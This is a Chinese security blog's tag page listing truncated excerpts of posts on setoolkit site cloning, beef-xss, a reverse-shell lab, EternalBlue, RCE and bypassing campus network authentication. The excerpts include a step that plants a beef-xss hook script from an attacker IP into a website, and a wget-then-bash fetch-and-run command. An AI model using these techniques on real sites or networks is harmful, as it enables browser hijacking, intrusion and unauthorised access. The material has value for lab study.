• 欢迎访问行云博客,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入行云博客 QQ群
  • 本站广招各类优秀作者,详情可以加群联系
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏行云博客吧

标签:shell

网站克隆:setoolkit社工软件

beef-xss安装beef-xss:1apt install beef-xss安装完成之后运行beef-xss:登录网址:http://192.168.232.138:3000/ui/authentication将beef-xss生成的js代码,放入网站中<script src="http://192.……

基于JavaScript的rce反弹shell漏洞

环境要求kali攻击机192.168.232.131win10靶机192.168.232.140工具地址https://github.com/CroweCybersecurity/ps1encode攻击步骤拉取工具到kali的根目录下1git clone https://github.com/CroweCybers……

永恒之蓝漏洞原理及利用

摘要什么是永恒之蓝永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过……

RCE(远程命令/代码执行漏洞)原理及复现

作用RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。原理远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后……

一分钟,改变你的Linux服务器登录界面

只需一分钟,你就会干我一样,爱上介款登录界面1234567891011121314151617//1.准备Linux操作系统  (centos演示如果你的是Debian系列的直接从第四步开始)//2,安装epel扩展yum  install  epel-release -y//3,安装软件//3.1cento……

流控搭建——绕过校园网认证系统

本文基于fas流控效果图:安装流程复制脚本到ssh终端,即你的服务器123wget --no-check-certificate https://cangshui.net/-down/-mysh/FAS/fas.shchmod +x fas.sh bash fas.sh如果提示123-bash: wget: comman……

服务器云监控——ServerStatus

ServerStatus-Toyo:ServerStatus-Toyo版是一个酷炫高逼格的云探针、云监控、服务器云监控、多服务器探针~,该云监控(云探针)是ServerStatus( https://github.com/tenyue/ServerStatus )项目的优化/修改版。在线演示:http://jk.kyscience.cn目录介绍:……